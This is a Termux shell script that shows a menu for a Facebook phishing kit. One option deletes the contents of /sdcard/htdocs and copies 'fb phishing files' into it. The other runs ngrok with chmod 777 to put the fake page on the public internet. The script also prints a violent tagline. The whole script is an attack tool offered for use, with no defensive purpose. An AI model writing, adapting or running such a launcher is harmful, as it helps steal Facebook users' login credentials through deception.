red='\033[0;31m'
lime='\033[1;32m'
yellow='\033[1;33m'
NC='\033[0m' # No Color
clear
printf "${red}====================================\n"
printf "${lime}            Abhay          \n"
printf "${red}====================================\n"
printf "${yellow}                                 \n"
printf "    1 - Copy fb phishing files in htdocs folder\n"
printf "    2 - Start Ngrok server to host htdocs files\n"
printf "    0 - Exit      \n"
printf "                         \n"
printf "${red}====================================\n"
printf "${lime}           Abhay        \n"
printf "${red}====================================\n"
printf "${lime}Enter Your Choice : ${NC}"
read choice

if [ $choice -eq 1 ]
then
clear
echo ${lime} Copying file, Please Wait... 
sleep 2
rm -rf /sdcard/htdocs/*
clear
cp $HOME/truthspinner/facebook/*.* /sdcard/htdocs/
printf "${yellow} Finished copying facebook folder files in htdocs successfully, if no error\n"
printf "${NC}"
elif [ $choice -eq 2 ]
then
clear
echo ${lime} Starting Server Please Wait... 
sleep 2
cd /data/data/com.termux/files/usr/bin/
chmod 777 ngrok
ngrok http 8080
clear
printf "${NC}"
elif [ $choice -eq 0 ]
then
clear
printf "${NC}\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
printf "${lime}Money buys silence for a time, a bolt in heart buys forever!\n${NC}"
sleep 1
clear
exit
else
clear
printf "${NC}\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
printf "${lime}Invalid Choice ! Try Again..\n${NC}"
sleep 1
sh start
fi